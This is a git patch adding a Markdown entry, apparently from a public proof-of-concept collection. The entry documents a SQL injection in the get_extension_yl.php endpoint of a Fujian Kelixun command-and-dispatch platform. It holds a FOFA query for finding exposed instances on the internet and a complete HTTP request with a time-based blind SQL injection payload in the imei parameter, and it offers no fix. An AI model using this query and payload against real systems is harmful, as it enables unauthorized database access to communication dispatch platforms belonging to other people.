From 471e37a29997ebb03ea22c7c5991a3c2c6da5752 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 24 Mar 2024 21:24:14 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=A6=8F=E5=BB=BA=E7=A7=91=E7=AB=8B?= =?UTF-8?q?=E8=AE=AF=E9=80=9A=E4=BF=A1=E6=8C=87=E6=8C=A5=E8=B0=83=E5=BA=A6?= =?UTF-8?q?=E5=B9=B3=E5=8F=B0get=5Fextension=5Fyl.php=E5=AD=98=E5=9C=A8sql?= =?UTF-8?q?=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...挥调度平台get_extension_yl.php存在sql注入漏洞.md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞.md diff --git a/福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞.md b/福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞.md new file mode 100644 index 0000000..c259a46 --- /dev/null +++ b/福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞.md @@ -0,0 +1,20 @@ +## 福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞 + +## fofa +``` +body="app/structure/departments.php"||app="指挥调度管理平台" +``` +## poc +``` +GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: authcode=h8g9 +Upgrade-Insecure-Requests: 1 +``` + +![3973d557bffaa4172f8077fe5f50f364](https://github.com/wy876/POC/assets/139549762/ec6a38f0-74ff-4be7-a668-f1af3aa0722c)